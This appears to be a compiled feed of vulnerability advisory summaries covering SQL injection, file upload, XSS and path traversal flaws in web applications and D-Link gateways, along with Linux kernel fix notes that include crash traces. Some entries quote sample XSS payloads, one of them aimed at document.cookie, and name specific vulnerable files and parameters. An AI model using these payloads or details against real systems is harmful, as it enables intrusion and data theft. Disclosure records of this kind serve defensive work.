A vulnerability, which was classified as critical, has been found in Tongda OA 2017. Affected by this issue is some unknown functionality of the file general/hr/manage/staff_transfer/delete.php. The manipulation of the argument TRANSFER_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-240878 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in huakecms 3.0. Affected by this vulnerability is an unknown functionality of the file /admin/cms_content.php. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240877 was assigned to this vulnerability.
In the Linux kernel, the following vulnerability has been resolved: SUNRPC: Fix a suspicious RCU usage warning I received the following warning while running cthon against an ontap server running pNFS: [ 57.202521] ============================= [ 57.202522] WARNING: suspicious RCU usage [ 57.202523] 6.7.0-rc3-g2cc14f52aeb7 #41492 Not tainted [ 57.202525] ----------------------------- [ 57.202525] net/sunrpc/xprtmultipath.c:349 RCU-list traversed in non-reader section!! [ 57.202527] other info that might help us debug this: [ 57.202528] rcu_scheduler_active = 2, debug_locks = 1 [ 57.202529] no locks held by test5/3567. [ 57.202530] stack backtrace: [ 57.202532] CPU: 0 PID: 3567 Comm: test5 Not tainted 6.7.0-rc3-g2cc14f52aeb7 #41492 5b09971b4965c0aceba19f3eea324a4a806e227e [ 57.202534] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS unknown 2/2/2022 [ 57.202536] Call Trace: [ 57.202537] &lt;TASK&gt; [ 57.202540] dump_stack_lvl+0x77/0xb0 [ 57.202551] lockdep_rcu_suspicious+0x154/0x1a0 [ 57.202556] rpc_xprt_switch_has_addr+0x17c/0x190 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6] [ 57.202596] rpc_clnt_setup_test_and_add_xprt+0x50/0x180 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6] [ 57.202621] ? rpc_clnt_add_xprt+0x254/0x300 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6] [ 57.202646] rpc_clnt_add_xprt+0x27a/0x300 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6] [ 57.202671] ? __pfx_rpc_clnt_setup_test_and_add_xprt+0x10/0x10 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6] [ 57.202696] nfs4_pnfs_ds_connect+0x345/0x760 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9] [ 57.202728] ? __pfx_nfs4_test_session_trunk+0x10/0x10 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9] [ 57.202754] nfs4_fl_prepare_ds+0x75/0xc0 [nfs_layout_nfsv41_files e3a4187f18ae8a27b630f9feae6831b584a9360a] [ 57.202760] filelayout_write_pagelist+0x4a/0x200 [nfs_layout_nfsv41_files e3a4187f18ae8a27b630f9feae6831b584a9360a] [ 57.202765] pnfs_generic_pg_writepages+0xbe/0x230 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9] [ 57.202788] __nfs_pageio_add_request+0x3fd/0x520 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902] [ 57.202813] nfs_pageio_add_request+0x18b/0x390 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902] [ 57.202831] nfs_do_writepage+0x116/0x1e0 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902] [ 57.202849] nfs_writepages_callback+0x13/0x30 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902] [ 57.202866] write_cache_pages+0x265/0x450 [ 57.202870] ? __pfx_nfs_writepages_callback+0x10/0x10 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902] [ 57.202891] nfs_writepages+0x141/0x230 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902] [ 57.202913] do_writepages+0xd2/0x230 [ 57.202917] ? filemap_fdatawrite_wbc+0x5c/0x80 [ 57.202921] filemap_fdatawrite_wbc+0x67/0x80 [ 57.202924] filemap_write_and_wait_range+0xd9/0x170 [ 57.202930] nfs_wb_all+0x49/0x180 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902] [ 57.202947] nfs4_file_flush+0x72/0xb0 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9] [ 57.202969] __se_sys_close+0x46/0xd0 [ 57.202972] do_syscall_64+0x68/0x100 [ 57.202975] ? do_syscall_64+0x77/0x100 [ 57.202976] ? do_syscall_64+0x77/0x100 [ 57.202979] entry_SYSCALL_64_after_hwframe+0x6e/0x76 [ 57.202982] RIP: 0033:0x7fe2b12e4a94 [ 57.202985] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 80 3d d5 18 0e 00 00 74 13 b8 03 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 44 c3 0f 1f 00 48 83 ec 18 89 7c 24 0c e8 c3 [ 57.202987] RSP: 002b:00007ffe857ddb38 EFLAGS: 00000202 ORIG_RAX: 0000000000000003 [ 57.202989] RAX: ffffffffffffffda RBX: 00007ffe857dfd68 RCX: 00007fe2b12e4a94 [ 57.202991] RDX: 0000000000002000 RSI: 00007ffe857ddc40 RDI: 0000000000000003 [ 57.202992] RBP: 00007ffe857dfc50 R08: 7fffffffffffffff R09: 0000000065650f49 [ 57.202993] R10: 00007f ---truncated---
A vulnerability, which was classified as critical, was found in Tongda OA 2017. Affected is an unknown function of the file general/hr/manage/staff_title_evaluation/delete.php. The manipulation of the argument EVALUATION_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-240870 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Simple Membership System 1.0. This issue affects some unknown processing of the file group_validator.php. The manipulation of the argument club_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240869 was assigned to this vulnerability.
A vulnerability classified as problematic was found in ForU CMS. This vulnerability affects unknown code of the file /admin/cms_admin.php. The manipulation of the argument del leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-240868.
A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /resource/addgood.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240867.
In the Linux kernel, the following vulnerability has been resolved: net: mana: Fix TX CQE error handling For an unknown TX CQE error type (probably from a newer hardware), still free the SKB, update the queue tail, etc., otherwise the accounting will be wrong. Also, TX errors can be triggered by injecting corrupted packets, so replace the WARN_ONCE to ratelimited error logging.
In the Linux kernel, the following vulnerability has been resolved: efivarfs: force RO when remounting if SetVariable is not supported If SetVariable at runtime is not supported by the firmware we never assign a callback for that function. At the same time mount the efivarfs as RO so no one can call that. However, we never check the permission flags when someone remounts the filesystem as RW. As a result this leads to a crash looking like this: $ mount -o remount,rw /sys/firmware/efi/efivars $ efi-updatevar -f PK.auth PK [ 303.279166] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 [ 303.280482] Mem abort info: [ 303.280854] ESR = 0x0000000086000004 [ 303.281338] EC = 0x21: IABT (current EL), IL = 32 bits [ 303.282016] SET = 0, FnV = 0 [ 303.282414] EA = 0, S1PTW = 0 [ 303.282821] FSC = 0x04: level 0 translation fault [ 303.283771] user pgtable: 4k pages, 48-bit VAs, pgdp=000000004258c000 [ 303.284913] [0000000000000000] pgd=0000000000000000, p4d=0000000000000000 [ 303.286076] Internal error: Oops: 0000000086000004 [#1] PREEMPT SMP [ 303.286936] Modules linked in: qrtr tpm_tis tpm_tis_core crct10dif_ce arm_smccc_trng rng_core drm fuse ip_tables x_tables ipv6 [ 303.288586] CPU: 1 PID: 755 Comm: efi-updatevar Not tainted 6.3.0-rc1-00108-gc7d0c4695c68 #1 [ 303.289748] Hardware name: Unknown Unknown Product/Unknown Product, BIOS 2023.04-00627-g88336918701d 04/01/2023 [ 303.291150] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 303.292123] pc : 0x0 [ 303.292443] lr : efivar_set_variable_locked+0x74/0xec [ 303.293156] sp : ffff800008673c10 [ 303.293619] x29: ffff800008673c10 x28: ffff0000037e8000 x27: 0000000000000000 [ 303.294592] x26: 0000000000000800 x25: ffff000002467400 x24: 0000000000000027 [ 303.295572] x23: ffffd49ea9832000 x22: ffff0000020c9800 x21: ffff000002467000 [ 303.296566] x20: 0000000000000001 x19: 00000000000007fc x18: 0000000000000000 [ 303.297531] x17: 0000000000000000 x16: 0000000000000000 x15: 0000aaaac807ab54 [ 303.298495] x14: ed37489f673633c0 x13: 71c45c606de13f80 x12: 47464259e219acf4 [ 303.299453] x11: ffff000002af7b01 x10: 0000000000000003 x9 : 0000000000000002 [ 303.300431] x8 : 0000000000000010 x7 : ffffd49ea8973230 x6 : 0000000000a85201 [ 303.301412] x5 : 0000000000000000 x4 : ffff0000020c9800 x3 : 00000000000007fc [ 303.302370] x2 : 0000000000000027 x1 : ffff000002467400 x0 : ffff000002467000 [ 303.303341] Call trace: [ 303.303679] 0x0 [ 303.303938] efivar_entry_set_get_size+0x98/0x16c [ 303.304585] efivarfs_file_write+0xd0/0x1a4 [ 303.305148] vfs_write+0xc4/0x2e4 [ 303.305601] ksys_write+0x70/0x104 [ 303.306073] __arm64_sys_write+0x1c/0x28 [ 303.306622] invoke_syscall+0x48/0x114 [ 303.307156] el0_svc_common.constprop.0+0x44/0xec [ 303.307803] do_el0_svc+0x38/0x98 [ 303.308268] el0_svc+0x2c/0x84 [ 303.308702] el0t_64_sync_handler+0xf4/0x120 [ 303.309293] el0t_64_sync+0x190/0x194 [ 303.309794] Code: ???????? ???????? ???????? ???????? (????????) [ 303.310612] ---[ end trace 0000000000000000 ]--- Fix this by adding a .reconfigure() function to the fs operations which we can use to check the requested flags and deny anything that's not RO if the firmware doesn't implement SetVariable at runtime.
A vulnerability, which was classified as critical, has been found in HimitZH HOJ up to 4.6-9a65e3f. This issue affects some unknown processing of the component Topic Handler. The manipulation leads to sandbox issue. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240365 was assigned to this vulnerability.
A vulnerability classified as critical has been found in ForU CMS. This affects an unknown part of the file /install/index.php. The manipulation of the argument db_name leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-240363. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-8000 up to 20151231 and classified as critical. This vulnerability affects unknown code of the file /sysmanage/changelogo.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-240250 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-8000 up to 20151231. This affects an unknown part of the file /Tool/querysql.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected by this issue is some unknown functionality of the file /importexport.php. The manipulation of the argument sql leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240248. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in D-Link DAR-8000 up to 20151231. Affected by this vulnerability is an unknown functionality of the file /autheditpwd.php. The manipulation of the argument hid_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240247. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /useratte/web.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-240246 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been rated as critical. This issue affects some unknown processing of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240245 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 and DAR-8000 up to 20151231. It has been declared as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240244. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been classified as critical. This affects an unknown part of the file /sysmanage/updateos.php. The manipulation of the argument 1_file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240243. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 and DAR-8000 up to 20151231 and classified as critical. Affected by this issue is some unknown functionality of the file /sysmanage/updatelib.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-240242 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000 up to 20151231 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240241 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /sysmanage/updateos.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240240. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000 up to 20151231. This issue affects some unknown processing of the file /log/webmailattach.php. The manipulation of the argument table_name leads to an unknown weakness. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240239. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
A vulnerability classified as problematic was found in H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 up to 20230908. This vulnerability affects unknown code of the file /userLogin.asp of the component Config File Handler. The manipulation leads to path traversal. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-240238 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in SourceCodester My Food Recipe 1.0. This vulnerability affects unknown code of the file index.php of the component Image Upload Handler. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239878 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /admin/category/cate-edit-run.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239877 was assigned to this vulnerability.
A vulnerability was found in OpenRapid RapidCMS 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/article/article-edit-run.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239876.
A vulnerability was found in OpenRapid RapidCMS 1.3.1. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/article/article-add.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239875.
A vulnerability has been found in Tongda OA up to 11.10 and classified as critical. This vulnerability affects unknown code of the file general/hr/recruit/plan/delete.php. The manipulation of the argument PLAN_ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239872.
A vulnerability, which was classified as critical, was found in mccms 2.6. This affects an unknown part of the file /category/order/hits/copyright/46/finish/1/list/1. The manipulation with the input '"1 leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239871.
A vulnerability, which was classified as problematic, has been found in China Unicom TEWA-800G 4.16L.04_CT2015_Yueme. Affected by this issue is some unknown functionality. The manipulation leads to information exposure through debug log file. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-239870 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Simple Membership System 1.0. Affected by this vulnerability is an unknown functionality of the file club_validator.php. The manipulation of the argument club leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239869 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Tongda OA 11.10. Affected is an unknown function of the file /general/ipanel/menu_code.php?MENU_TYPE=FAV. The manipulation of the argument OA_SUB_WINDOW leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239868.
A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability.
A vulnerability was found in Planno 23.04.04. It has been classified as problematic. This affects an unknown part of the component Comment Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239865 was assigned to this vulnerability.
A vulnerability was found in Tongda OA 2017 and classified as critical. Affected by this issue is some unknown functionality of the file general/hr/manage/staff_relatives/delete.php. The manipulation of the argument RELATIVES_ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239864.
A vulnerability has been found in DedeCMS up to 5.7.100 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /include/dialog/select_templets_post.php. The manipulation of the argument activepath leads to absolute path traversal. The associated identifier of this vulnerability is VDB-239863.
A vulnerability, which was classified as problematic, was found in SourceCodester AC Repair and Services System 1.0. Affected is an unknown function of the file admin/?page=system_info/contact_information. The manipulation of the argument telephone/mobile/address leads to cross site scripting. It is possible to launch the attack remotely. VDB-239862 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in 07FLY CRM V2. This issue affects some unknown processing of the file /index.php/sysmanage/Login/login_auth/ of the component Administrator Login Page. The manipulation of the argument account leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239861 was assigned to this vulnerability.
A vulnerability classified as critical was found in Tongda OA. This vulnerability affects unknown code of the file general/hr/manage/staff_reinstatement/delete.php. The manipulation of the argument REINSTATEMENT_ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-239860.
A vulnerability classified as critical has been found in SourceCodester Lost and Found Information System 1.0. This affects an unknown part of the file /classes/Master.php?f=save_category of the component POST Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-239859.
A vulnerability was found in lmxcms up to 1.41. It has been rated as critical. Affected by this issue is some unknown functionality of the file admin.php. The manipulation of the argument lid leads to sql injection. VDB-239858 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in UCMS 1.4.7. It has been classified as problematic. Affected is an unknown function of the file ajax.php?do=strarraylist. The manipulation of the argument strdefault leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239856.
A vulnerability was found in Sakshi2610 Food Ordering Website 1.0 and classified as critical. This issue affects some unknown processing of the file categoryfood.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239855.
A vulnerability has been found in Pluck CMS 4.7.18 and classified as problematic. This vulnerability affects unknown code of the file install.php of the component Installation Handler. The manipulation of the argument contents with the input &lt;script&gt;alert('xss')&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-239854 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Topaz OFD 2.11.0.201. This affects an unknown part of the file C:\Program Files\Topaz OFD\Warsaw\core.exe of the component Protection Module Warsaw. The manipulation leads to unquoted search path. Attacking locally is a requirement. Upgrading to version 2.12.0.259 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-239853 was assigned to this vulnerability.
A vulnerability was found in NextBX QWAlerter 4.50. It has been rated as critical. Affected by this issue is some unknown functionality of the file QWAlerter.exe. The manipulation leads to unquoted search path. It is possible to launch the attack on the local host. The identifier of this vulnerability is VDB-239804. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Bettershop LaikeTui. This affects an unknown part of the file index.php?module=system&amp;action=uploadImg. The manipulation of the argument imgFile leads to unrestricted upload. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-239799.
A vulnerability, which was classified as critical, has been found in infinitietech taskhub 2.8.7. Affected by this issue is some unknown functionality of the file /home/get_tasks_list of the component GET Parameter Handler. The manipulation of the argument project/status/user_id/sort/search leads to sql injection. VDB-239798 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Supcon InPlant SCADA up to 20230901. Affected by this vulnerability is an unknown functionality of the file Project.xml. The manipulation leads to password hash with insufficient computational effort. Local access is required to approach this attack. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-239797 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Supcon InPlant SCADA up to 20230901. Affected is an unknown function of the file Project.xml. The manipulation leads to improper authentication. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239796. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in didi KnowSearch 0.3.2/0.3.1.2. It has been rated as problematic. This issue affects some unknown processing of the file /api/es/admin/v3/security/user/1. The manipulation leads to unprotected storage of credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239795.
A vulnerability was found in app1pro Shopicial up to 20230830. It has been declared as problematic. This vulnerability affects unknown code of the file search. The manipulation of the argument from with the input comments&lt;/script&gt;'"&gt;&lt;img src=x onerror=alert(document.cookie)&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239794 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely. The identifier VDB-239749 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in phpipam 1.5.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Header Handler. The manipulation of the argument X-Forwarded-Host leads to open redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239732.
SAS application is vulnerable to Reflected Cross-Site Scripting (XSS). Improper input validation in the `_program` parameter of the the `/SASStoredProcess/do` endpoint allows arbitrary JavaScript to be executed when specially crafted URL is opened by an authenticated user. The attack is possible from a low-privileged user. Only versions 9.4_M7 and 9.4_M8 were tested and confirmed to be vulnerable, status of others is unknown. For above mentioned versions hot fixes were published.
A vulnerability, which was classified as critical, was found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230906. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-239358 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Contact Manager App 1.0. This issue affects some unknown processing of the file add.php. The manipulation of the argument contact/contactName leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239357 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Contact Manager App 1.0. This vulnerability affects unknown code of the file delete.php. The manipulation of the argument contact/contactName leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239356.
A vulnerability classified as problematic has been found in SourceCodester Contact Manager App 1.0. This affects an unknown part of the file index.php of the component Contact Information Handler. The manipulation of the argument contactID with the input "&gt;&lt;sCrIpT&gt;alert(1)&lt;/ScRiPt&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239355.
A vulnerability was found in SourceCodester Contact Manager App 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file update.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-239354 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Contact Manager App 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file add.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239353 was assigned to this vulnerability.
A vulnerability was found in Xintian Smart Table Integrated Management System 5.6.9. It has been classified as critical. Affected is an unknown function of the file /SysManage/AddUpdateSites.aspx of the component Added Site Page. The manipulation of the argument TbxSiteName leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239352.
A vulnerability has been found in SourceCodester Take-Note App 1.0 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239350 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Take-Note App 1.0. This affects an unknown part of the file index.php. The manipulation of the argument noteContent with the input &lt;script&gt;alert('xss')&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239349 was assigned to this vulnerability.
A vulnerability was found in IBOS OA 4.5.5 and classified as critical. This issue affects some unknown processing of the file ?r=dashboard/database/optimize. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239261 was assigned to this vulnerability.
A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. This vulnerability affects unknown code of the file ?r=dashboard/position/edit&amp;op=member. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239260.
